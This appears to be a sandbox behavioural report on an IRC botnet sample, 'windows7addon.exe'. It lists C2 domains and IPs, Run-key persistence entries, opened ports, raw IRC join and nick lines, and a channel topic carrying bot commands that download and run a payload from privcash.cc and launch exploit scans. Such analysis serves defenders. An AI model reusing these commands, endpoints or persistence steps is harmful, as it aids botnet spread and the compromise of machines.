login.ipwhois.org.uk(very big botnet)

5.c) windows7addon.exe – Network Activity – DNS Queries:

Name Query Type Query Result Successful Protocol
login.ipwhois.org.uk DNS_TYPE_A 111.68.19.104 1
login.ipwhois.co.uk DNS_TYPE_A 111.68.19.104 1
www.pr0.net DNS_TYPE_A 64.59.116.150 1

– IRC Conversations:

111.68.19.104:47221
Nick: [00_AUT_XP_1270214]
Username: SP3-601
Joined Channel: #russi
Channel Topic for Channel #russi: “.asc -S -s|.http http://privcash.cc/10.exe|.asc exp_all 15 5 0 -a -r -e -s|.asc exp_all 20 5 0 -b -r -e -s|.asc exp_all 20 5 0 -c -e -s”
Private Message to Channel #xxs: “HTTP SET http://privcash.cc/10.exe”

Memory Modifications

There was a new process created in the system:
Process Name Process Filename Main Module Size
windows7addon.exe %Windir%windows7addon.exe 344.064 bytes

Registry Modifications

The following Registry Keys were created:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun
The newly created Registry Values are:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
Microsoft Driver Setup = “%Windir%windows7addon.exe”

so that windows7addon.exe runs every time Windows starts
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
Microsoft Driver Setup = “%Windir%windows7addon.exe”

so that windows7addon.exe runs every time Windows starts

Other details

The following ports were open in the system:
Port Protocol Process
1055 TCP windows7addon.exe (%Windir%windows7addon.exe)
1057 TCP windows7addon.exe (%Windir%windows7addon.exe)
1058 TCP windows7addon.exe (%Windir%windows7addon.exe)
1059 TCP windows7addon.exe (%Windir%windows7addon.exe)
1391 TCP windows7addon.exe (%Windir%windows7addon.exe)
1392 TCP windows7addon.exe (%Windir%windows7addon.exe)
1393 TCP windows7addon.exe (%Windir%windows7addon.exe)
1394 TCP windows7addon.exe (%Windir%windows7addon.exe)
1395 TCP windows7addon.exe (%Windir%windows7addon.exe)
1396 TCP windows7addon.exe (%Windir%windows7addon.exe)
1397 TCP windows7addon.exe (%Windir%windows7addon.exe)
1398 TCP windows7addon.exe (%Windir%windows7addon.exe)
1399 TCP windows7addon.exe (%Windir%windows7addon.exe)
1400 TCP windows7addon.exe (%Windir%windows7addon.exe)
1401 TCP windows7addon.exe (%Windir%windows7addon.exe)
1402 TCP windows7addon.exe (%Windir%windows7addon.exe)
1403 TCP windows7addon.exe (%Windir%windows7addon.exe)
1404 TCP windows7addon.exe (%Windir%windows7addon.exe)
1405 TCP windows7addon.exe (%Windir%windows7addon.exe)
1406 TCP windows7addon.exe (%Windir%windows7addon.exe)
1407 TCP windows7addon.exe (%Windir%windows7addon.exe)
1408 TCP windows7addon.exe (%Windir%windows7addon.exe)
1409 TCP windows7addon.exe (%Windir%windows7addon.exe)
1410 TCP windows7addon.exe (%Windir%windows7addon.exe)
1411 TCP windows7addon.exe (%Windir%windows7addon.exe)
1412 TCP windows7addon.exe (%Windir%windows7addon.exe)
1413 TCP windows7addon.exe (%Windir%windows7addon.exe)
1414 TCP windows7addon.exe (%Windir%windows7addon.exe)
1415 TCP windows7addon.exe (%Windir%windows7addon.exe)
1416 TCP windows7addon.exe (%Windir%windows7addon.exe)
1417 TCP windows7addon.exe (%Windir%windows7addon.exe)
1418 TCP windows7addon.exe (%Windir%windows7addon.exe)

Remote Host Port Number
111.68.19.104 47221

The data identified by the following URL was then requested from the remote web server:
http://www.pr0.net/deny2/azenv.php

NICK [00_USA_XP_9974434]
MODE [00_USA_XP_9974434] -ix
JOIN #russi
PRIVMSG #xxs :HTTP SET http://privcash.cc/10.exe
USER SP2-810 * 0 :COMPUTERNAME

10.exe analysis

Unknown Connections
Host By Name:
Requested Host: server1.unibaq.com
Resulting Address: 212.95.47.105
Requested Host: home-off-d5f0ac
Resulting Address: 172.16.2.34
Connection Established: 0
Socket: 0
UDP Connections
Send Datagram
Remote Address 212.95.47.105
Remote Port: 7002
Size: 7
Remote Address 212.95.47.105
Remote Port: 7002
Size: 3
Remote Address 212.95.47.105
Remote Port: 7002
Size: 43
Receive Datagram
Local Port: 0
Remote Address 212.95.47.105
Remote Port: 7002
Size: 0
Local Port: 0
Remote Address 212.95.47.105
Remote Port: 7002
Size: 8
Local Port: 0
Remote Address 212.95.47.105
Remote Port: 7002
Size: 3

Transport Protocol: UDP
Remote Address: 212.95.47.105
Remote Port: 7002
Protocol: Unknown
Connection Established: 1
Socket: 2736